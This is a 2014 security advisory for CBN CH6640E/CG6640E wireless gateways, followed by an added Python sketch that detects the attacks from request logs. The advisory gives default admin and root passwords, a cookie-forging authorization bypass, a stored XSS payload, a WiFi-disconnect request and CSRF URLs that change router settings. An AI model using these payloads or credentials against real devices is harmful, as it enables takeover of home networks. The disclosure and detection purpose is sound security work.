CVSS2: 10 High (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AI Score: 6.8 Medium (Confidence: Low)
EPSS: 0.045 Low (Percentile: 92.5%)
Title: CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
Advisory ID: ZSL-2014-5203
Type: Local/Remote
Impact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting, DoS
Risk: (3/5)
Release Date: 25.10.2014
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Description: The CBN modem gateway suffers from multiple vulnerabilities including authorization bypass information disclosure, stored XSS, CSRF and denial of service.
Vendor: Compal Broadband Networks (CBN), Inc. - <http://www.icbn.com.tw>
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
N/A
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <http://cxsecurity.com/issue/WLB-2014100162>
[2] <http://www.exploit-db.com/exploits/35075/>
[3] <http://osvdb.org/show/osvdb/113836>
[4] <http://osvdb.org/show/osvdb/113837>
[5] <http://osvdb.org/show/osvdb/113838>
[6] <http://osvdb.org/show/osvdb/113839>
[7] <http://osvdb.org/show/osvdb/113840>
[8] <http://osvdb.org/show/osvdb/113841>
[9] <http://osvdb.org/show/osvdb/113842>
[10] <http://osvdb.org/show/osvdb/113843>
[11] <http://packetstormsecurity.com/files/128860>
[12] <http://www.securityfocus.com/bid/70762>
[13] <http://xforce.iss.net/xforce/xfdb/98328>
[14] <http://xforce.iss.net/xforce/xfdb/98329>
[15] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653>
[16] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654>
[17] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655>
[18] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656>
[19] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657>
[20] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8653>
[21] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8654>
[22] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8655>
[23] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8656>
[24] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8657>
[25.10.2014] - Initial release
[28.10.2014] - Added reference [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11] and [12]
[30.10.2014] - Added reference [13] and [14]
[07.11.2014] - Added reference [15], [16], [17], [18], [19], [20], [21], [22], [23] and [24]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
Vendor: Compal Broadband Networks (CBN), Inc.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.
Default credentials:
admin/admin - Allows access to the gateway pages
root/compalbn - Allows access to the gateway and provisioning pages and provides more
configuration information.
Desc: The CBN modem gateway suffers from multiple vulnerabilities including
authorization bypass information disclosure, stored XSS, CSRF and denial of
service.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
---
Authorization Bypass Information Disclosure Vulnerability
#########################################################
http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml
Setting the userData cookie to root or admin reveals additional pages and information.
--
</p>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
--
Stored Cross-Site Scripting (XSS) Vulnerability
###############################################
Cookie: userData
Value: hax0r"><script>alert(document.cookie);</script>
--
<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
--
Cross-Site Request Forgery (CSRF) Vulnerability
###############################################
DDNS config:
------------
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
-----------------
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
-----------------------------------------------------
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
--------------------
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
</body></html>
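Detection sketch for the CSRF, DoS and cookie issues described above, written over HTTP request records such as a proxy or IDS would log. This is an added example, not part of the original advisory; the record layout, the finding labels, the user-name pattern and the example.test origin are assumptions.

```python
import re
from urllib.parse import urlsplit

GATEWAY_HOST = "192.168.0.1"  # gateway address used throughout the advisory
# GET endpoints the advisory shows changing configuration when given parameters.
STATE_CHANGING = {"/basicDDNS.html", "/setWirelessSecurity.html",
                  "/setBasicDHCP1.html", "/setAdvancedOptions.html"}
# Endpoint the advisory shows disconnecting WiFi clients with a bare GET.
NO_PARAM_TRIGGERS = {"/wirelessChannelStatus.html"}
# Assumption: a legitimate userData value is a short plain user name.
SAFE_USERDATA = re.compile(r"[A-Za-z0-9_.-]{1,32}")

def user_data(cookie_header):
    """Return the raw userData cookie value, or None if the cookie is absent."""
    for part in (cookie_header or "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "userData":
            return value
    return None

def classify(record):
    """Return finding labels for one request record (url, referer, cookie)."""
    findings = []
    url = urlsplit(record["url"])
    if url.hostname != GATEWAY_HOST:
        return findings
    acts = (url.path in STATE_CHANGING and bool(url.query)) or url.path in NO_PARAM_TRIGGERS
    # A missing Referer counts as foreign: browsers drop it on HTTPS-to-HTTP requests.
    if acts and urlsplit(record.get("referer") or "").hostname != GATEWAY_HOST:
        findings.append("cross-site-state-change")
    value = user_data(record.get("cookie"))
    if value is not None and not SAFE_USERDATA.fullmatch(value):
        findings.append("userData-not-a-username")
    return findings

# Constructed sample records (not captured traffic); example.test is a placeholder origin.
SAMPLE_RECORDS = [
    {"url": "http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&psKey=x",
     "referer": "http://example.test/page.html", "cookie": "userData=admin"},
    {"url": "http://192.168.0.1/setAdvancedOptions.html?action=apply&UPnP=2",
     "referer": "http://192.168.0.1/", "cookie": "userData=admin"},
    {"url": "http://192.168.0.1/basicLanUsers.html", "referer": "http://192.168.0.1/",
     "cookie": 'userData=hax0r"><script>alert(document.cookie);</script>'},
    {"url": "http://192.168.0.1/wirelessChannelStatus.html", "referer": None, "cookie": None},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(rec["url"], classify(rec))
```

The value check cannot tell a forged userData=root from a real login, because the cookie carries only the user name; that part of the advisory needs a firmware fix rather than detection.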